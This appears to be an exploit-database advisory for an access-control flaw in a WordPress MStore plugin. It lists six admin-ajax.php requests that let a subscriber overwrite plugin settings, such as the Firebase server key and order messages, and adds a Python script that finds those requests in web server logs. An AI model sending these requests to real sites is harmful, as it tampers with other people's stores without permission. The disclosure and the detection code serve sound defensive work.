## https://sploitus.com/exploit?id=WPEX-ID:970735F1-24BB-441C-89B6-5A0959246D6C
Make sure the site also has WooCommerce installed and activated. Then, while logged in as a subscriber, visit the following URLs:
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_limit_product&limit=99
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_firebase_server_key&serverKey=hacked
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_title&title=1337
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_message&message=hacked+message
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_title&title=1338
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_message&message=hacked+message
Then, while logged in as an administrator, visit /wp-admin/admin.php?page=mstore-plugin and notice that the requests have changed all the values.
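
To check whether these requests have already been made against a site, the web server access log can be searched for the six actions listed above. This is an added example, not part of the original advisory; it assumes Apache/nginx Combined Log Format, and the function name and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The six settings-changing AJAX actions listed in the reproduction steps.
MSTORE_ACTIONS = {
    "mstore_update_limit_product",
    "mstore_update_firebase_server_key",
    "mstore_update_new_order_title",
    "mstore_update_new_order_message",
    "mstore_update_status_order_title",
    "mstore_update_status_order_message",
}

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_mstore_setting_changes(lines):
    """Return one dict per request that invoked a listed action via the query string.

    Parameters sent in a POST body are not in access logs, so this only sees
    actions passed in the URL, as in the steps above.
    """
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        for action in query.get("action", []):
            if action in MSTORE_ACTIONS:
                hits.append({"ip": m["ip"], "time": m["time"], "action": action,
                             "status": int(m["status"]),
                             "params": {k: v for k, v in query.items() if k != "action"}})
    return hits

# Constructed sample log lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=mstore_update_limit_product&limit=99 HTTP/1.1" 200 5 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2024:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=mstore_update_new_order_message&message=hacked+message HTTP/1.1" 200 5 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Jan/2024:10:01:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Jan/2024:10:02:00 +0000] "GET /shop/?action=mstore_update_limit_product HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_mstore_setting_changes(SAMPLE_LOG):
        print(hit)
```

Any hit whose source address does not belong to a site administrator is worth comparing against the current values on the plugin settings page.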